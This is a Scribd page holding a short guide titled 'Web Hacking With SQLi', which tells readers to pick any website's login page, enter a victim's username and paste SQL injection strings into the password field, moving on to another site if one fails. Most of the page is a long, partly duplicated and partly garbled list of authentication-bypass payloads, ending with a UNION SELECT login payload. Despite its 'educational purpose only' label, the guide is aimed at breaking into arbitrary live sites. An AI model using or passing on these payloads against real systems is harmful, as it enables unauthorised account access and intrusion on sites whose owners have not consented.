Scribd Logo
Upload

Welcome to Scribd!

  • Web Hacking With SQLi

    Uploaded by

    SauravModak
    3 views5 pages
    SQL injection authentication bypass method. a simple sql injection method and a list of authentication bypass scripts. Only for newbie penetration testers and students. (educational purpose only)

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    SQL injection authentication bypass method. a simple sql injection method and a list of authentication bypass scripts. Only for newbie penetration testers and students. (educational purpose only)

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    3 views5 pages

    Web Hacking With SQLi

    Uploaded by

    SauravModak
    SQL injection authentication bypass method. a simple sql injection method and a list of authentication bypass scripts. Only for newbie penetration testers and students. (educational purpose only)

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 5

    There are many websites in the World Wide Web are still vulnerable to SQL Injection.

    step1: go to website's login page.

    step2: in username type the name of user you want to hack. Ex:

    step3: in password field type any of those sql codes form the end of this article. Ex:

    step4: if page saying invalid password then go to another site.

    And if you are logged in, Enjoy you hacked your 1st site :)

    More SQL login bypass code:' or '1'='1


    ' or 'x'='x
    ' or 0=0 -" or 0=0 -= 'or' 1=1
    or 0=0 -' or 0=0 #
    " or 0=0 #

    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    ') or ('x'='x
    ' or 1=1-" or 1=1-or 1=1-' or a=a-" or "a"="a
    ') or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 -hi' or 1=1 -'or'1=1'
    ==
    and 1=1-and 1=1
    ' or 'one'='one-' or 'one'='one
    ' and 'one'='one
    ' and 'one'='one-1') and '1'='1-admin' -admin' #
    admin'/*
    or 1=1--

    or 1=1#
    or 1=1/*
    ) or '1'='1-) or ('1'='1-' or '1'='1
    ' or 'x'='x
    ' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    ') or ('x'='x
    ' or 1=1-" or 1=1-or 1=1-' or a=a-" or "a"="a
    ') or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 -hi' or 1=1 -'or'1=1'
    or 1=1

    or 1=1-or 1=1#
    or 1=1/*
    admin' -admin' #
    admin'/*
    admin' or '1'='1
    admin' or '1'='1'-admin' or '1'='1'#
    admin' or '1'='1'/*
    admin'or 1=1 or ''='
    admin' or 1=1
    admin' or 1=1-admin' or 1=1#
    admin' or 1=1/*
    admin') or ('1'='1
    admin') or ('1'='1'-admin') or ('1'='1'#
    admin') or ('1'='1'/*
    admin') or '1'='1
    admin') or '1'='1'-admin') or '1'='1'#
    admin') or '1'='1'/*
    1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

    You might also like